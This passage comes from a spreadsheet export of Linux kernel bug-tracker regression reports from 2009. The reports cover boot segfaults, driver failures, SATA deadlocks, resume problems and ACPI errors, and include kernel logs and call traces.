    <t>(I haven't had a chance to collect all that data that I wanted to collect before reporting this bug, but this might be the best I can do for the next few days, so I think it's best for me to submit what I have so far instead of sitting on it.) The system in question is a Debian etch system which has a static /dev (no udev) and does not use an initrd or initramfs. With 2.6.28.8, it works fine. With 2.6.28.9, init segfaults during boot, so the system fails to finish booting. (Same problem happens on 2.6.27.21 and does not happen on 2.6.27.20, but I have not had time to investigate that version in depth.) git bisect says "92db6956ecd01ceb7934be0252b3b184a82ebb64 is first bad commit". That's "Add '-fwrapv' to gcc CFLAGS". If I take 2.6.28.9 and I revert "Move cc-option to below arch-specific setup" and "Add '-fwrapv' to gcc CFLAGS" then the resulting kernel works again. I also noticed that the problem only happens with some gcc's: Problem occurs: gcc (GCC) 4.1.2 20061115 (prerelease) (Debian 4.1.1-21) gcc-4.1 (GCC) 4.1.3 20080704 (prerelease) (Debian 4.1.2-25) Problem does not occur (i.e. 2.6.28.9 works and I don't have to revert anything): gcc-4.2 (GCC) 4.2.4 (Debian 4.2.4-6) gcc (Debian 4.3.2-1.1) 4.3.2 (BTW, on 2.6.29, I'm having a problem where if I'm running 2.6.29 then make instantly blows up in a strange way, and the same pattern of working/failing compilers is showing up there too.) I have not yet had a chance to try vanilla gcc 4.1.2. That's what I intend to try next. I'll attach my .config within the next 24 hours, and I'll try to post serial console captures by sometime Tuesday or so. If there's any other information which would help, feel free to ask... My gut feeling is that this is truly a gcc bug rather than a kernel bug, but it's still disconcerting to see this kind of breakage suddenly pop up in a -stable series, so IMO it may be worth considering reverting the -fwrapv changes for 2.6.2[78].y.</t>
  </si>
  <si>
    <t>pppoe over ethernet</t>
  </si>
  <si>
    <t>2009-04-05 19:32 UTC</t>
  </si>
  <si>
    <t>2009-04-07 21:22 UTC</t>
  </si>
  <si>
    <t>Subject : pppoe over ethernet Submitter : Detlef Tschirschky &lt;detlef.tschirschky@gmx.de&gt; Date : 2009-03-25 21:28 References : http://marc.info/?l=linux-kernel&amp;m=123801663105671&amp;w=4 Notify-Also : Cyrill Gorcunov &lt;gorcunov@gmail.com&gt; This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>consistent oops from request_key in 2.6.29</t>
  </si>
  <si>
    <t>2009-04-05 20:01 UTC</t>
  </si>
  <si>
    <t>2009-04-10 17:45 UTC</t>
  </si>
  <si>
    <t>Subject : consistent oops from request_key in 2.6.29 Submitter : Jeff Layton &lt;jlayton@redhat.com&gt; Date : 2009-03-31 12:45 References : http://marc.info/?l=linux-kernel&amp;m=123850360107293&amp;w=4 Handled-By : David Howells &lt;dhowells@redhat.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123852150806814&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>nozomi: pppd fails on kernel 2.6.29</t>
  </si>
  <si>
    <t>2009-04-06 19:12 UTC</t>
  </si>
  <si>
    <t>Mark Karpeles</t>
  </si>
  <si>
    <t>2010-11-15 22:10 UTC</t>
  </si>
  <si>
    <t>Opening /dev/noz0 with minicom or open() syscall allows communication with Option NV 3G+ PCMCIA card. When running pppd however, no reply is seen from the card (chat timeouts). Downgrading nozomi.c from kernel 2.6.28 fixes this problem. Not sure about exactly which informations are needed. I'm going to diff the two nozomi.c files and try to locate what's wrong (and maybe fix it), however if anyone did some major changes between the two versions, maybe he will know and will be able to fix this problem before I get enough time to look into it. The kernel "tree" used is genpatches for both kernels (http://dev.gentoo.org/~dsd/genpatches/) however it seems that nozomi.c is left untouched. I might be able to run tests on a vanilla kernel if need arise (I prefer only compiling nozomi.c as it's much faster).</t>
  </si>
  <si>
    <t>cs5536 is broken</t>
  </si>
  <si>
    <t>2.6.29.1</t>
  </si>
  <si>
    <t>2009-04-06 20:34 UTC</t>
  </si>
  <si>
    <t>2009-04-26 10:54 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.29.1 BUG: unable to handle kernel NULL pointer dereference at (null) Submitter : Arnd Hannemann &lt;hannemann@nets.rwth-aachen.de&gt; Date : 2009-04-06 18:11 References : http://marc.info/?l=linux-kernel&amp;m=123904159829771&amp;w=4 Handled-By : Sergei Shtylyov &lt;sshtylyov@ru.mvista.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123904273731477&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Resume after hibernation regression in forcedeth</t>
  </si>
  <si>
    <t>2009-04-06 20:39 UTC</t>
  </si>
  <si>
    <t>2009-04-26 10:56 UTC</t>
  </si>
  <si>
    <t>Subject : Resume after hibernation regression in 2.6.29 Submitter : "Tvrtko A. Ursulin" &lt;tvrtko@ursulin.net&gt; Date : 2009-03-27 20:09 References : http://marc.info/?l=linux-kernel&amp;m=123818507814476&amp;w=4 Handled-By : Ed Swierk &lt;eswierk@aristanetworks.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=123878076717061&amp;w=4 This entry is being used for tracking a regression from 2.6.28. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>media revalidation bug on USB card reader</t>
  </si>
  <si>
    <t>2.6.38</t>
  </si>
  <si>
    <t>2009-04-06 23:04 UTC</t>
  </si>
  <si>
    <t>David Zeuthen</t>
  </si>
  <si>
    <t>2011-05-30 07:59 UTC</t>
  </si>
  <si>
    <t>Hi, I have a Belkin card reader [1] where media revalidation appears to be broken. The kernel will happily return ENOMEDIUM when opening the /dev/sdb with O_RDONLY but only when running 'touch /dev/sdb' the partition goes away. I would think that if the kernel knows enough to return ENOMEDIUM for /dev/sdb it should be able to also infer that the partitions from /dev/sdb1 are no more. It is also very weird because I only see this behavior on the Belkin device, not on other USB card readers. This is on 2.6.29.1-46.fc11.x86_64 from Fedora Rawhide. Here is the detailed log. First we kill all polling [root@x61 1-3]# killall hald-addon-storage Then we listen on uevents [root@x61 1-3]# udevadm monitor monitor will print the received events for: UDEV the event which udev sends out after rule processing UEVENT the kernel uevent # insert CF card and run 'touch /dev/sdb' in another shell UEVENT[1239057973.774859] change /devices/pci0000:00/0000:00:1a.7/usb1/1-3/1-3:1.0/host19/target19:0:0/19:0:0:0/block/sdb (block) UEVENT[1239057973.774932] add /devices/pci0000:00/0000:00:1a.7/usb1/1-3/1-3:1.0/host19/target19:0:0/19:0:0:0/block/sdb/sdb1 (block) UEVENT[1239057973.778183] change /devices/pci0000:00/0000:00:1a.7/usb1/1-3/1-3:1.0/host19/target19:0:0/19:0:0:0/block/sdb (block) UEVENT[1239057973.814998] change /devices/pci0000:00/0000:00:1a.7/usb1/1-3/1-3:1.0/host19/target19:0:0/19:0:0:0 (scsi) UDEV [1239057973.962835] change /devices/pci0000:00/0000:00:1a.7/usb1/1-3/1-3:1.0/host19/target19:0:0/19:0:0:0/block/sdb (block) UDEV [1239057974.094378] add /devices/pci0000:00/0000:00:1a.7/usb1/1-3/1-3:1.0/host19/target19:0:0/19:0:0:0/block/sdb/sdb1 (block) UDEV [1239057974.265656] change /devices/pci0000:00/0000:00:1a.7/usb1/1-3/1-3:1.0/host19/target19:0:0/19:0:0:0/block/sdb (block) UEVENT[1239057974.269085] change /devices/pci0000:00/0000:00:1a.7/usb1/1-3/1-3:1.0/host19/target19:0:0/19:0:0:0/block/sdb (block) UDEV [1239057974.269574] change /devices/pci0000:00/0000:00:1a.7/usb1/1-3/1-3:1.0/host19/target19:0:0/19:0:0:0 (scsi) UDEV [1239057974.437891] change /devices/pci0000:00/0000:00:1a.7/usb1/1-3/1-3:1.0/host19/target19:0:0/19:0:0:0/block/sdb (block) # Now we remove CF card - note that since user space don't poll for media changes nothing happens # [...] # Now we run 'blockdev --rereadpt /dev/sdb'. It fails with # # /dev/sdb: No medium found # # The only interaction with the device that happens is that it # does open("/dev/sdb", O_RDONLY) and which fails with ENOMEDIUM # # However the following uevents occur UEVENT[1239058028.675551] change /devices/pci0000:00/0000:00:1a.7/usb1/1-3/1-3:1.0/host19/target19:0:0/19:0:0:0 (scsi) UEVENT[1239058028.686676] change /devices/pci0000:00/0000:00:1a.7/usb1/1-3/1-3:1.0/host19/target19:0:0/19:0:0:0/block/sdb (block) UDEV [1239058028.686744] change /devices/pci0000:00/0000:00:1a.7/usb1/1-3/1-3:1.0/host19/target19:0:0/19:0:0:0 (scsi) UDEV [1239058028.765815] change /devices/pci0000:00/0000:00:1a.7/usb1/1-3/1-3:1.0/host19/target19:0:0/19:0:0:0/block/sdb (block) # Note that we didn't get a remove event for /dev/sdb1. It is still around # both in sysfs and /dev # # run 'touch /dev/sdb' to get the remove event. # UEVENT[1239058055.909464] remove /devices/pci0000:00/0000:00:1a.7/usb1/1-3/1-3:1.0/host19/target19:0:0/19:0:0:0/block/sdb/sdb1 (block) UDEV [1239058055.921046] remove /devices/pci0000:00/0000:00:1a.7/usb1/1-3/1-3:1.0/host19/target19:0:0/19:0:0:0/block/sdb/sdb1 (block) UEVENT[1239058055.947384] change /devices/pci0000:00/0000:00:1a.7/usb1/1-3/1-3:1.0/host19/target19:0:0/19:0:0:0/block/sdb (block) UDEV [1239058056.029241] change /devices/pci0000:00/0000:00:1a.7/usb1/1-3/1-3:1.0/host19/target19:0:0/19:0:0:0/block/sdb (block) # Essentially touch just does # # open("/dev/sdb", O_WRONLY|O_CREAT|O_NOCTTY|O_NONBLOCK, 0666) = 3 # dup2(3, 0) = 0 # close(3) = 0 # utimensat(0, NULL, NULL, 0) = 0 # close(0) = 0 [1] : # pwd /sys/devices/pci0000:00/0000:00:1a.7/usb1/1-3 # cat idProduct idVendor manufacturer product 0248 050d BELKIN USB 2 Flash Media Device</t>
  </si>
  <si>
    <t>Deadlock/hang in SATA probe</t>
  </si>
  <si>
    <t>2.6.29-ge0724bf6</t>
  </si>
  <si>
    <t>2009-04-06 23:33 UTC</t>
  </si>
  <si>
    <t>2009-04-22 19:41 UTC</t>
  </si>
  <si>
    <t>Created attachment 20839 [details] dmesg I've updated from 2.6.29-rc4 to current git, and after reboot (1) I do see disks attached to the PM connected to sata_sil24, but (2) they are not visible to the block layer, and (3) kernel complains that couple of async threads were blocked for more than 480 seconds... I'm not sure whether problem is with async code, or with the way SCSI host probe waits for async operations to complete, or with async_port_probe in SATA for ports != 0. As I see two threads blocked in async_port_probe, which nicely correlates with harddisks connected to port 1 &amp; 2 of PM, I'll start with SATA. ata4: SATA link up 3.0 Gbps (SStatus 123 SControl 0) ata4.15: Port Multiplier 1.1, 0x1095:0x3726 r23, 6 ports, feat 0x1/0x9 ata4.00: hard resetting link ata4.00: SATA link up 3.0 Gbps (SStatus 123 SControl 320) ata4.01: hard resetting link ata4.01: SATA link up 3.0 Gbps (SStatus 123 SControl 300) ata4.02: hard resetting link ata4.02: SATA link up 3.0 Gbps (SStatus 123 SControl 300) ata4.03: hard resetting link ata4.03: SATA link down (SStatus 0 SControl 320) ata4.04: hard resetting link ata4.04: SATA link down (SStatus 0 SControl 320) ata4.05: hard resetting link ata4.05: SATA link up 1.5 Gbps (SStatus 113 SControl 320) ata4.00: ATA-7: ST3750640AS, 3.AAE, max UDMA/133 ata4.00: 1465149168 sectors, multi 0: LBA48 NCQ (depth 31/32) ata4.00: configured for UDMA/100 ata4.01: ATA-7: Hitachi HDS721010KLA330, GKAOA70F, max UDMA/133 ata4.01: 1953525168 sectors, multi 0: LBA48 NCQ (depth 31/32) ata4.01: configured for UDMA/100 ata4.02: ATA-7: Hitachi HDS721010KLA330, GKAOA70F, max UDMA/133 ata4.02: 1953525168 sectors, multi 0: LBA48 NCQ (depth 31/32) ata4.02: configured for UDMA/100 ata4: EH complete scsi: waiting for bus probes to complete ... ... INFO: task async/1:3416 blocked for more than 480 seconds. "echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message. async/1 D 0000000000000000 0 3416 2 ffff88011dd97d40 0000000000000046 ffff88011dd97c70 0000000000000046 00000000001d33c0 000000000000e568 0000000000000000 ffff88011ea2c5a0 ffffffff807b34a0 ffff88011ea2c968 000000001dd97d00 00000000ffff9233 Call Trace: [&lt;ffffffff805d25b5&gt;] ? _spin_unlock_irqrestore+0x65/0x80 [&lt;ffffffff805cf393&gt;] schedule+0x13/0x40 [&lt;ffffffff8026fde5&gt;] async_synchronize_cookie_domain+0x75/0x130 [&lt;ffffffff80268fa0&gt;] ? autoremove_wake_function+0x0/0x40 [&lt;ffffffff8027a83d&gt;] ? trace_hardirqs_on+0xd/0x10 [&lt;ffffffff8026feb0&gt;] async_synchronize_cookie+0x10/0x20 [&lt;ffffffff8026fed4&gt;] async_synchronize_full+0x14/0x30 [&lt;ffffffff804b98b9&gt;] scsi_complete_async_scans+0x79/0x130 [&lt;ffffffff804ba0b5&gt;] __scsi_add_device+0xe5/0x110 [&lt;ffffffff804d0ed2&gt;] ata_scsi_scan_host+0xb2/0x1e0 [&lt;ffffffff804cde07&gt;] async_port_probe+0xb7/0xf0 [&lt;ffffffff8026fc07&gt;] async_thread+0x107/0x270 [&lt;ffffffff8024b4c0&gt;] ? default_wake_function+0x0/0x10 [&lt;ffffffff8026fb00&gt;] ? async_thread+0x0/0x270 [&lt;ffffffff80268ad9&gt;] kthread+0x49/0x80 [&lt;ffffffff8020cfba&gt;] child_rip+0xa/0x20 [&lt;ffffffff80249f09&gt;] ? finish_task_switch+0x89/0x110 [&lt;ffffffff805d2526&gt;] ? _spin_unlock_irq+0x36/0x60 [&lt;ffffffff8020c980&gt;] ? restore_args+0x0/0x30 [&lt;ffffffff80268a90&gt;] ? kthread+0x0/0x80 [&lt;ffffffff8020cfb0&gt;] ? child_rip+0x0/0x20 INFO: lockdep is turned off. INFO: task async/2:3417 blocked for more than 480 seconds. "echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message. async/2 D 0000000000000001 0 3417 2 ffff88011dc8fe00 0000000000000046 0000000000000000 0000000000000046 00000000001d33c0 000000000000e568 0000000000000001 ffff88011ea28000 ffff88011dd245a0 ffff88011ea283c8 000000011dc8fdc0 0000000000000046 Call Trace: [&lt;ffffffff805d25b5&gt;] ? _spin_unlock_irqrestore+0x65/0x80 [&lt;ffffffff805cf393&gt;] schedule+0x13/0x40 [&lt;ffffffff8026fde5&gt;] async_synchronize_cookie_domain+0x75/0x130 [&lt;ffffffff80268fa0&gt;] ? autoremove_wake_function+0x0/0x40 [&lt;ffffffff8026feb0&gt;] async_synchronize_cookie+0x10/0x20 [&lt;ffffffff804cde20&gt;] async_port_probe+0xd0/0xf0 [&lt;ffffffff8026fc07&gt;] async_thread+0x107/0x270 [&lt;ffffffff8024b4c0&gt;] ? default_wake_function+0x0/0x10 [&lt;ffffffff8026fb00&gt;] ? async_thread+0x0/0x270 [&lt;ffffffff80268ad9&gt;] kthread+0x49/0x80 [&lt;ffffffff8020cfba&gt;] child_rip+0xa/0x20 [&lt;ffffffff80249f09&gt;] ? finish_task_switch+0x89/0x110 [&lt;ffffffff805d2526&gt;] ? _spin_unlock_irq+0x36/0x60 [&lt;ffffffff8020c980&gt;] ? restore_args+0x0/0x30 [&lt;ffffffff80268a90&gt;] ? kthread+0x0/0x80 [&lt;ffffffff8020cfb0&gt;] ? child_rip+0x0/0x20 INFO: lockdep is turned off. INFO: task async/3:3418 blocked for more than 480 seconds. "echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message. async/3 D 0000000000000001 0 3418 2 ffff88011e44fe00 0000000000000046 0000000000000000 0000000000000046 00000000001d33c0 000000000000e568 0000000000000001 ffff88011dd245a0 ffff88011fa6c5a0 ffff88011dd24968 000000011e44fdc0 00000000ffff9237 Call Trace: [&lt;ffffffff805d25b5&gt;] ? _spin_unlock_irqrestore+0x65/0x80 [&lt;ffffffff805cf393&gt;] schedule+0x13/0x40 [&lt;ffffffff8026fde5&gt;] async_synchronize_cookie_domain+0x75/0x130 [&lt;ffffffff80268fa0&gt;] ? autoremove_wake_function+0x0/0x40 [&lt;ffffffff8026feb0&gt;] async_synchronize_cookie+0x10/0x20 [&lt;ffffffff804cde20&gt;] async_port_probe+0xd0/0xf0 [&lt;ffffffff8026fc07&gt;] async_thread+0x107/0x270 [&lt;ffffffff8024b4c0&gt;] ? default_wake_function+0x0/0x10 [&lt;ffffffff8026fb00&gt;] ? async_thread+0x0/0x270 [&lt;ffffffff80268ad9&gt;] kthread+0x49/0x80 [&lt;ffffffff8020cfba&gt;] child_rip+0xa/0x20 [&lt;ffffffff80249f09&gt;] ? finish_task_switch+0x89/0x110 [&lt;ffffffff805d2526&gt;] ? _spin_unlock_irq+0x36/0x60 [&lt;ffffffff8020c980&gt;] ? restore_args+0x0/0x30 [&lt;ffffffff80268a90&gt;] ? kthread+0x0/0x80 [&lt;ffffffff8020cfb0&gt;] ? child_rip+0x0/0x20 INFO: lockdep is turned off.</t>
  </si>
  <si>
    <t>S3: 2.6.29 regression: network interfaces drop after resume - Dell Inspiron 600m laptop</t>
  </si>
  <si>
    <t>2009-04-07 00:08 UTC</t>
  </si>
  <si>
    <t>Jose Marino</t>
  </si>
  <si>
    <t>2009-05-16 21:46 UTC</t>
  </si>
  <si>
    <t>Created attachment 20841 [details] Kernel logs right after loading b44 driver: modprobe b44 b44_debug=31 After a fresh reboot everything works just fine. The problems appear after resuming from suspend to ram at least once. Both network interfaces (ethernet and wireless) keep dropping continuously. Dropping frequency seems to depend on traffic. BTW suspend to ram seems to work perfectly fine. This problem happens in a Dell Inspiron 600m laptop. The ethernet card uses driver b44 and the wireless ipw2200. The problem occurs with kernels 2.6.29 and 2.6.29.1, but not with 2.6.28 or less. I'll attach some kernel logs showing what happens from the moment I load the network drivers. The interface drops happen within seconds after the connection is established. One more thing, while using the wireless card the connection drops happen much more frequently when using encrypted networks (both WEP and WPA).</t>
  </si>
  <si>
    <t>printk in xs_tcp_setup_socket needs rate limit ... and delay</t>
  </si>
  <si>
    <t>2.6.29-ge0724bf6e4</t>
  </si>
  <si>
    <t>2009-04-07 03:14 UTC</t>
  </si>
  <si>
    <t>2010-12-09 04:30 UTC</t>
  </si>
  <si>
    <t>My box suddenly got EADDRNOTAVAIL in sunrpc, and printk in xs_tcp_setup_socket killed the box as it has no ratelimit... Apr 6 19:11:23 petr-dev3 /usr/sbin/gpm[5237]: Request on 7 (console 1) Apr 6 19:13:04 petr-dev3 kernel: xs_tcp_setup_socket: connect returned unhandled error -99 Apr 6 19:13:05 petr-dev3 last message repeated 1882 times Apr 6 19:13:05 petr-dev3 kernel: xs_tcp_setup_sococket: connect returned unhandled error -99 Apr 6 19:13:05 petr-dev3 kernel: xs_tcp_setocket: connect returned unhandled error -99 Apr 6 19:13:05 petr-dev3 kernel: xs_tcp_setup_socket: connect returned unhandled error -99 Apr 6 19:13:05 petr-dev3 last message repeated 3 times Apr 6 19:13:05 petr-dev3 kernel: xs_tcp_setup_ocket: connect returned unhandled error -99 Apr 6 19:13:05 petr-dev3 kernel: xs_tcp_setup_socket: connect returned unhandled error -99 Apr 6 19:13:05 petr-dev3 kernel: xs_tcp_setup_socket: connect returned unhandled error -99 Apr 6 19:13:05 petr-dev3 kernel: xs_tcp_setup_ocket: connect returned unhandled error -99 Perhaps unexpected errors should be retried with delay too? After 60 seconds hardware watchdog decided that box is not sufficiently alive, and rebooted it, so I have no idea why code got EADDRNOTAVAIL error (box has static IPv4 which should be one used for communication, and IPv6 which should not be used for NFS).</t>
  </si>
  <si>
    <t>ACPI Error (hwvalid-0186): Denied AML access to port 0x00000080/4 (DMA1 0x0081-0x0083) [20090320] ACPI Exception (evregion-0422): AE_AML_ILLEGAL_ADDRESS, Returned by Handler for [SystemIO] [20090320]</t>
  </si>
  <si>
    <t>2.6.29-git14</t>
  </si>
  <si>
    <t>2009-04-07 10:12 UTC</t>
  </si>
  <si>
    <t>2009-04-28 15:58 UTC</t>
  </si>
  <si>
    <t>ACPI Error (hwvalid-0186): Denied AML access to port 0x00000080/4 (DMA1 0x0081-0x0083) [20090320] ACPI Exception (evregion-0422): AE_AML_ILLEGAL_ADDRESS, Returned by Handler for [SystemIO] [20090320] ACPI Error (psparse-0537): Method parse/execution failed [\P8XH] (Node f7017900), AE_AML_ILLEGAL_ADDRESS ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.LPCB.EC__._Q58] (Node f701ab58), AE_AML_ILLEGAL_ADDRESS ACPI Error (hwvalid-0186): Denied AML access to port 0x00000080/4 (DMA1 0x0081-0x0083) [20090320] ACPI Exception (evregion-0422): AE_AML_ILLEGAL_ADDRESS, Returned by Handler for [SystemIO] [20090320] ACPI Error (psparse-0537): Method parse/execution failed [\P8XH] (Node f7017900), AE_AML_ILLEGAL_ADDRESS ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.LPCB.EC__._Q59] (Node f701ab70), AE_AML_ILLEGAL_ADDRESS ACPI Error (hwvalid-0186): Denied AML access to port 0x00000080/4 (DMA1 0x0081-0x0083) [20090320] ACPI Exception (evregion-0422): AE_AML_ILLEGAL_ADDRESS, Returned by Handler for [SystemIO] [20090320] ACPI Error (psparse-0537): Method parse/execution failed [\P8XH] (Node f7017900), AE_AML_ILLEGAL_ADDRESS ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.LPCB.EC__._Q58] (Node f701ab58), AE_AML_ILLEGAL_ADDRESS ACPI Error (hwvalid-0186): Denied AML access to port 0x00000080/4 (DMA1 0x0081-0x0083) [20090320] ACPI Exception (evregion-0422): AE_AML_ILLEGAL_ADDRESS, Returned by Handler for [SystemIO] [20090320] ACPI Error (psparse-0537): Method parse/execution failed [\P8XH] (Node f7017900), AE_AML_ILLEGAL_ADDRESS ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.LPCB.EC__._Q59] (Node f701ab70), AE_AML_ILLEGAL_ADDRESS ACPI Error (hwvalid-0186): Denied AML access to port 0x00000080/4 (DMA1 0x0081-0x0083) [20090320] ACPI Exception (evregion-0422): AE_AML_ILLEGAL_ADDRESS, Returned by Handler for [SystemIO] [20090320] ACPI Error (psparse-0537): Method parse/execution failed [\P8XH] (Node f7017900), AE_AML_ILLEGAL_ADDRESS ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.LPCB.EC__._Q25] (Node f701a348), AE_AML_ILLEGAL_ADDRESS ACPI Error (hwvalid-0186): Denied AML access to port 0x00000080/4 (DMA1 0x0081-0x0083) [20090320] ACPI Exception (evregion-0422): AE_AML_ILLEGAL_ADDRESS, Returned by Handler for [SystemIO] [20090320] ACPI Error (psparse-0537): Method parse/execution failed [\P8XH] (Node f7017900), AE_AML_ILLEGAL_ADDRESS ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.LPCB.EC__._Q25] (Node f701a348), AE_AML_ILLEGAL_ADDRESS ACPI Error (hwvalid-0186): Denied AML access to port 0x00000080/4 (DMA1 0x0081-0x0083) [20090320] ACPI Exception (evregion-0422): AE_AML_ILLEGAL_ADDRESS, Returned by Handler for [SystemIO] [20090320] ACPI Error (psparse-0537): Method parse/execution failed [\P8XH] (Node f7017900), AE_AML_ILLEGAL_ADDRESS ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.LPCB.EC__._Q25] (Node f701a348), AE_AML_ILLEGAL_ADDRESS ACPI Error (hwvalid-0186): Denied AML access to port 0x00000080/4 (DMA1 0x0081-0x0083) [20090320] ACPI Exception (evregion-0422): AE_AML_ILLEGAL_ADDRESS, Returned by Handler for [SystemIO] [20090320] ACPI Error (psparse-0537): Method parse/execution failed [\P8XH] (Node f7017900), AE_AML_ILLEGAL_ADDRESS ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.LPCB.EC__._Q25] (Node f701a348), AE_AML_ILLEGAL_ADDRESS ACPI Error (hwvalid-0186): Denied AML access to port 0x00000080/4 (DMA1 0x0081-0x0083) [20090320] ACPI Exception (evregion-0422): AE_AML_ILLEGAL_ADDRESS, Returned by Handler for [SystemIO] [20090320] ACPI Error (psparse-0537): Method parse/execution failed [\P8XH] (Node f7017900), AE_AML_ILLEGAL_ADDRESS ACPI Error (psparse-0537): Method parse/execution failed [\_SB_.PCI0.LPCB.EC__._Q25] (Node f701a348), AE_AML_ILLEGAL_ADDRESS</t>
  </si>
  <si>
    <t>OQO 01+ doesn't power off since 2.6.24</t>
  </si>
  <si>
    <t>2.6.28.2+</t>
  </si>
  <si>
    <t>2009-04-07 20:56 UTC</t>
  </si>
  <si>
    <t>Jamie Lentin</t>
  </si>
  <si>
    <t>2009-05-18 16:29 UTC</t>
  </si>
  <si>
    <t>Since 2.6.24, my OQO 01+ will not enter S5. There are no abnormal messages, however the device sits in the halted state. Weirdly, S3 &amp; S4 are fine. Using git bisect, the commit that caused S5 to stop working is:- http://git.kernel.org/?p=linux/kernel/git/aegl/linux-2.6.git;a=commit;h=c95d47a868f35cd47643d116a3c680cdaa954df8 ACPI: Separate invocations of _GTS and _BFS from _PTS and _WAK In particular, the call to GTS in acpi_enter_sleep_state is upsetting something. I have tried the following:- * Moving the GTS method call to the beginning of acpi_enter_sleep_state(), this has no effect. * Removing the GTS method call entirely results in working S5---obviously I won't be submitting this patch but keeps me happy for now. Any suggestions as to what to try next for a better fix? Basic debug info can be found here:- acpidump: http://jamie.lentin.co.uk/hardware/oqo_01plus/acpidump.txt dmidecode: http://jamie.lentin.co.uk/hardware/oqo_01plus/dmidecode.txt dmesg (2.6.28.2): http://jamie.lentin.co.uk/hardware/oqo_01plus/dmesg.txt Thanks for any help</t>
  </si>
  <si>
    <t>2.6.30-rc1</t>
  </si>
  <si>
    <t>Heinz Diehl</t>
  </si>
  <si>
    <t>iwlagn wifi stopped working from 2.6.29-git to 2.6.30-rc1</t>
  </si>
  <si>
    <t>2009-04-09 18:45 UTC</t>
  </si>
  <si>
    <t>Riccardo Magliocchetti</t>
  </si>
  <si>
    <t>2009-04-10 13:56 UTC</t>
  </si>
  <si>
    <t>Created attachment 20907 [details] config $subject says it all. I have a bisect log from another issue and the card worked properly with ea431793f198e26d1553f36ed8b5a830b531eee4 iirc.</t>
  </si>
  <si>
    <t>First hibernation attempt fails</t>
  </si>
  <si>
    <t>2009-04-10 10:58 UTC</t>
  </si>
  <si>
    <t>2009-04-19 10:58 UTC</t>
  </si>
  <si>
    <t>Last working version: 2.6.29 On my laptop (EEE 4G), the first attempt at hibernation fails. Subsequent attempts succeed. If I use s2disk as normal, I see "snapshotting system", then before it gets to write out the image, it aborts and switches back to X. I can't see any error message, even if I check the log with "dmesg". If I use "echo disk &gt; /sys/power/state", echo reports the error "Cannot allocate memory". References: http://marc.info/?l=linux-kernel&amp;m=123928022321917&amp;w=2</t>
  </si>
  <si>
    <t>UIO specific device driver missing statement for depmod</t>
  </si>
  <si>
    <t>2009-04-10 13:32 UTC</t>
  </si>
  <si>
    <t>Ronald</t>
  </si>
  <si>
    <t>2012-05-30 16:06 UTC</t>
  </si>
  <si>
    <t>The module uio_cif.c is missing a statement like "MODULE_DEVICE_TABLE(pci, hilscher_pci_ids);". Without it , depmod will not fill the modules.alias and modules.pcimap files with the used pic id's.</t>
  </si>
  <si>
    <t>Devicemapper fails to load/initialise, root filesystem can not be accessed</t>
  </si>
  <si>
    <t>2.6.30-rc1|-git</t>
  </si>
  <si>
    <t>2009-04-11 12:35 UTC</t>
  </si>
  <si>
    <t>2009-04-14 17:26 UTC</t>
  </si>
  <si>
    <t>Created attachment 20936 [details] Ingo Molnar's reversion Hi, I have a machine which has a LUKS/dmcrypt encrypted root fs. Booting a 2.6.30-rc/git kernel (and also 2.6.29-git15), the root fs can not be mounted any longer, and the system boots into /bin/sh. The cause seems to be that the device-mapper can not be initialised before the root fs is going to be mounted at bootup, caused by the async boot process. I don't know... This happens both on openSuSE and Fedora laptops too, which have an encrypted root fs, my wife has one. The solution is to revert "9710794: async: remove the temporary (2.6.29) "async is off by default" I've attached the reversion, posted by Ingo Molnar som days ago, which was the fix for a bug which is unrelated to this one, and also a screencopy. Unfortunately, without any root fs available, I can't provide more information. If 9710794 goes into mainline, it breaks all systems which have encrypted root fs. Regards, Heinz.</t>
  </si>
  <si>
    <t>Intel HD Audio oops</t>
  </si>
  <si>
    <t>commit bb798169d1bb860b07192cf9c75937fadc8610b4</t>
  </si>
  <si>
    <t>2009-04-11 20:18 UTC</t>
  </si>
  <si>
    <t>2009-04-17 21:07 UTC</t>
  </si>
  <si>
    <t>Subject : Intel HD Audio oops Submitter : Jeff Chua &lt;jeff.chua.linux@gmail.com&gt; Date : 2009-04-01 8:28 References : http://marc.info/?l=linux-kernel&amp;m=123857454625829&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>iwl3945: wlan0: beacon loss from AP - sending probe request</t>
  </si>
  <si>
    <t>2.6.29-git12</t>
  </si>
  <si>
    <t>2009-04-11 20:24 UTC</t>
  </si>
  <si>
    <t>2009-05-07 11:30 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.29-git12 iwl3945] wlan0: beacon loss from AP 00:19:5b:e7:a2:f8 - sending probe request Submitter : Maciej Rutecki &lt;maciej.rutecki@gmail.com&gt; Date : 2009-04-05 9:11 References : http://marc.info/?l=linux-kernel&amp;m=123892272218266&amp;w=4 This entry is being used for tracking a regression from 2.6.29. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Lockdep warining in inotify_dev_queue_event</t>
  </si>
  <si>
    <t>2009-04-11 20:30 UTC</t>
  </si>
  <si>
    <t>2009-05-17 10:24 UTC</t>
  </si>
  <si>
